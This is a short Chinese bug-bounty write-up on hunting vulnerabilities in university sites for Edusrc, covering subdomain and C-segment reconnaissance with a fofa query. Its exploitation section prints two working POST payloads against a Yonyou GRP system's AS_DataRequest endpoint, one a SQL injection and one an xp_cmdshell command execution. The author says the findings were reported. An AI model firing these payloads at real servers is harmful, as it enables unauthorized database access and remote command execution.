简单探讨Edusrc挖掘方法

0x01 前言

在业余时间，突然决定挖掘教育行业网站的漏洞。从Edusrc高校排行榜中随机选取一所学校，展开测试。

0x02 信息搜集

首要任务是信息搜集。出于便利，直接收集子域名，不关心whoami、资产、CDN等，使用oneforall全面扫描。

激动地打开扫描结果，发现只有几个站点。这可让我为难了。

逐个测试站点，但没有取得理想的结果，只找到了一些低危漏洞。重新思考后，决定收集C段信息。

成功获取C段信息，开始测试C段的站点。通过fofa语法搜索，筛选出目标站点。

<br><br>ip="X.X.X.0/24" && status_code="200"

测试每个网段，终于找到一个脆弱的站点，打开一看，竟然是用友的GRP系统。

进行百度搜索，发现存在多个可利用的漏洞。

0x03 漏洞验证与利用

开始验证漏洞，发现存在SQL注入和RCE漏洞。通过hackbar使用POST方式提交以下Payload：

<code>cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><r9packet version="1"><dataformat>XML</dataformat><r9function><name>AS_DataRequest</name><params><param><name>ProviderName</name><data format="text">DataSetProviderData</data><param><name>Data</name><data format="text">select db_name() </data></params></r9function></r9packet></code>

然后使用Burp Suite抓包，发送到重放器中。

成功爆出数据库的名字，虽然只是中危，接下来尝试RCE。同样通过hackbar使用POST方式提交以下Payload

<code>cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><r9packet version="1"><dataformat>XML</dataformat><r9function><name>AS_DataRequest</name><params><param><name>ProviderName</name><data format="text">DataSetProviderData</data><param><name>Data</name><data format="text">exec xp_cmdshell 'whoami'</data></params></r9function></r9packet></code>

再次使用Burp Suite抓包，发送到重放器中。

成功执行，获得另一个高危漏洞！

0x04 结尾

漏洞已经上报给Edusrc。挖掘过程并不复杂，漏洞也都是在网上找到的。最关键的是信息收集，收集的地址越多，成功挖掘高危漏洞的机会也就越大（当然，大佬们例外）。

总体而言，挖掘漏洞的步骤是信息搜集，找寻脆弱站点，然后利用网上公开的相同系统漏洞进行验证与利用。